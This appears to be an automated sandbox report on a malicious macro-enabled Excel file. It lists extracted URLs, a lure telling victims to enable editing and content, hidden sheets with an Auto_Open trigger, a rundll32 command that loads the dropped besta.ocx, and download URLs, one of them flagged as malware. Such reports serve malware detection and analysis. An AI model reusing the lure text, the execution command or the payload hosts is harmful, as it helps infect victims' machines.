    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0)
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=4.
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min.c
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.cs
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/v4-shims.min.css?v
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver
    Source: EXCEL.EXE, 00000000.00000003.537272193.0000000005BB1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537148185.0000000005B9C000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.
    Source: EXCEL.EXE, 00000000.00000003.537272193.0000000005BB1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537148185.0000000005B9C000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/happy-elementor-addons/assets/fonts/style.min.css?ver=3.
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/happy-elementor-addons/assets/js/happy-addons.min.js?ver
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/themes/twentytwentyone/assets/css/ie.css?ver=1.4
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.4
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.4
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/AE.svg
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/anuncios-300x270.png
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/anuncios.png
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/apple_android.svg
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/elementor.svg
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/figma.svg
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/framer.svg
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-facebook.png
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-google-adwords.png
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-instagram.png
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-youtube.png
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/microsoft.svg
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/visual-Studio.svg
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/webflow.svg
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-1024x348.png
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-1536x522.png
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-1568x533.png
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-2048x696.png
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-300x102.png
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-768x261.png
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/elementor/css/global.css?ver=1637592552
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/elementor/css/post-1522.css?ver=1638212153
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/elementor/css/post-2017.css?ver=1638212282
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/elementor/css/post-2157.css?ver=1638212282
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/elementor/css/post-5.css?ver=1637592550
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/images/caso-exito1.png
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/images/comentario1.jpg
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/images/comentario5-m.jpg
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/images/comentario6.jpg
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-includes/css/dist/block-library/style.min.css?ver=5.8.2
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-includes/js/imagesloaded.min.js?ver=4.1.4
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-includes/js/jquery/ui/core.min.js?ver=1.12.1
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-includes/js/wp-embed.min.js?ver=5.8.2
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-includes/wlwmanifest.xml
    Source: EXCEL.EXE, 00000000.00000002.735831519.000000000050F000.00000004.00000020.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-json/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fvendes.marketing%2F
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fvendes.marketing%2F&format=
    Source: EXCEL.EXE, 00000000.00000002.735831519.000000000050F000.00000004.00000020.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-json/wp/v2/pages/1522
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/xmlrpc.php?rsd
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://www.thinkwithgoogle.com/intl/es-419/futuro-del-marketing/transformacion-digital/tiendas-omni
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://www.thinkwithgoogle.com/intl/es-419/insights/tendencias-de-consumo/6-certezas-sobre-el-nuevo
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2FADF20A.pngJump to behavior
    Source: unknownDNS traffic detected: queries for: standoutglobal.com
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: vendes.marketingConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /transmigrant/Wplzr/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: vendes.marketingConnection: Keep-Alive
    Source: unknownHTTPS traffic detected: 107.180.46.229:443 -> 192.168.2.22:49169 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing. please click "Enable Content
    Source: Screenshot number: 4Screenshot OCR: protected documents. 3 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled edi
    Source: Screenshot number: 4Screenshot OCR: Enable Content" button 6 7 8 9 10 11 12 13 14 15 RunDLL |~| 16 17 18 The'e was a proble
    Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing. please click "Enable Content
    Source: Screenshot number: 8Screenshot OCR: protected documents. 3 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled edi
    Source: Screenshot number: 8Screenshot OCR: Enable Content" button 6 7 8 9 :: 12 13 14 15 16 17 18 q ^ Ly 20 21 22 23 24 2
    Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
    Source: Document image extraction number: 0Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
    Source: Document image extraction number: 0Screenshot OCR: Enable Content" button
    Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
    Source: Document image extraction number: 1Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
    Source: Document image extraction number: 1Screenshot OCR: Enable Content" button
    Source: SCAN_7295943480515097.xlsmMacro extractor: Sheet name: Buk2
    Source: SCAN_7295943480515097.xlsmMacro extractor: Sheet name: Buk5
    Source: SCAN_7295943480515097.xlsmMacro extractor: Sheet name: Buk1
    Source: SCAN_7295943480515097.xlsmMacro extractor: Sheet name: Buk7
    Source: SCAN_7295943480515097.xlsmMacro extractor: Sheet name: EFEWF
    Source: SCAN_7295943480515097.xlsmMacro extractor: Sheet name: Buk3
    Source: SCAN_7295943480515097.xlsmMacro extractor: Sheet name: Buk4
    Source: SCAN_7295943480515097.xlsmMacro extractor: Sheet name: Buk6
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02E966E80_2_02E966E8
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02E966F30_2_02E966F3
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02E963400_2_02E96340
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02E967430_2_02E96743
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02E967530_2_02E96753
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02E9CF010_2_02E9CF01
    Source: workbook.xmlBinary string: \Desktop\Fil\1d\Cir\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{8197EE46-A436-4D64-BA91-0FA619A1F240}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Ss1" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Ss1br2" sheetId="3" state="hidden" r:id="rId3"/><sheet name="Ssbr3" sheetId="4" state="hidden" r:id="rId4"/><sheet name="EFEWF" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Buk1" sheetId="6" state="hidden" r:id="rId6"/><sheet name="Buk2" sheetId="7" state="hidden" r:id="rId7"/><sheet name="Buk3" sheetId="8" state="hidden" r:id="rId8"/><sheet name="Buk4" sheetId="9" state="hidden" r:id="rId9"/><sheet name="Buk5" sheetId="10" state="hidden" r:id="rId10"/><sheet name="Buk6" sheetId="11" state="hidden" r:id="rId11"/><sheet name="Buk7" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="LKLW">EFEWF!$D$3</definedName><definedName name="SASA">EFEWF!$D$17</definedName><definedName name="SASA1">EFEWF!$D$19</definedName><definedName name="SASA2">EFEWF!$D$21</definedName><definedName name="_xlnm.Auto_Open">EFEWF!$D$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: CBD7.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: SCAN_7295943480515097.xlsmVirustotal: Detection: 21%
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4280415509
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4280415509
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4280415509Jump to behavior
    Source: EXCEL.EXE, 00000000.00000002.737179895.00000000050F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.477889247.0000000001F10000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$SCAN_7295943480515097.xlsmJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE58D.tmpJump to behavior
    Source: classification engineClassification label: mal76.expl.winXLSM@3/6@2/2
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: SCAN_7295943480515097.xlsmInitial sample: OLE zip file path = xl/worksheets/sheet4.xml
    Source: SCAN_7295943480515097.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: SCAN_7295943480515097.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: SCAN_7295943480515097.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
    Source: SCAN_7295943480515097.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: SCAN_7295943480515097.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: SCAN_7295943480515097.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: CBD7.tmp.0.drInitial sample: OLE indicators vbamacros = False
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: Yara matchFile source: app.xml, type: SAMPLE
    Source: EXCEL.EXE, 00000000.00000002.735884786.0000000000890000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: EXCEL.EXE, 00000000.00000002.735884786.0000000000890000.00000002.00020000.sdmpBinary or memory string: !Progman
    Source: EXCEL.EXE, 00000000.00000002.735884786.0000000000890000.00000002.00020000.sdmpBinary or memory string: Program Manager<

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1Path InterceptionProcess Injection2Masquerading1OS Credential DumpingProcess Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    SCAN_7295943480515097.xlsm22%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    standoutglobal.com3%VirustotalBrowse
    vendes.marketing3%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://vendes.marketing/agencia-de-marketing-digital/ecommerce/conversion-rate-optimization/0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/plugins/happy-elementor-addons/assets/fonts/style.min.css?ver=3.0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/2021/10/framer.svg0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/elementor/css/post-1522.css?ver=16382121530%Avira URL Cloudsafe
    http://standoutglobal.com/2/MWpqeVgZ/Softwa100%Avira URL Cloudmalware
    https://vendes.marketing/agencia-de-marketing-digital-en-cdmx/0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eico0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.4.80%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/conversion-rate-optimizati0%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-300x102.png0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/diseno-web-ux/0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/creacion-de-con0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/2021/10/anuncios-300x270.png0%Avira URL Cloudsafe
    http://schemas.open0%URL Reputationsafe
    https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/estrategias-en-0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/pagos-online/0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/branding/0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/images/comentario1.jpg0%Avira URL Cloudsafe
    https://vendes.marketing/0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/fotografia-y-edicion/0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?0%Avira URL Cloudsafe
    http://standoutglobal.c0%Avira URL Cloudsafe
    https://vendes.marketing/blog/0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/2021/10/visual-Studio.svg0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/publicidad-digi0%Avira URL Cloudsafe
    https://vendes.marketing/comments/feed/0%Avira URL Cloudsafe
    https://vendes.marketing/wp-includes/js/wp-embed.min.js?ver=5.8.20%Avira URL Cloudsafe
    http://vendes.marketing/transmigrant/Wplzr/0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.mi0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tienda-online-con-magento/0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/consultorias/marketing-para-el-sector-salud/0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.cs0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-1536x522.png0%Avira URL Cloudsafe
    https://vendes.marketing/wp-includes/wlwmanifest.xml0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/automatizacion-de-0%Avira URL Cloudsafe
    http://schemas.openformatrg/drawml/2006/spreadsheetD0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.4.80%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/2021/10/figma.svg0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-instagram.png0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.0.20%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital-en-monterrey/0%Avira URL Cloudsafe
    https://vendes.marketing/nY0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/consultorias/consultoria-en-marketing-basado-e0%Avira URL Cloudsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    https://vendes.marketing/agencia-de-marketing-digital/consultorias/auditorias-y-optimizacion-de-camp0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/desarrollo-de-mega0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/elementor/css/post-2157.css?ver=16382122820%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.40%Avira URL Cloudsafe
    http://standoutglobal.co0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/plugins/elementor-pro/assets/lib/lottie/lottie.min.js?ver=5.6.60%Avira URL Cloudsafe
    https://vendes.marketing/wp-includes/css/dist/block-library/style.min.css?ver=5.8.20%Avira URL Cloudsafe
    http://schemas.openformatrg/package/2006/r0%URL Reputationsafe
    https://vendes.marketing/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/consultorias/digital-partner-incubadora-de-neg0%Avira URL Cloudsafe
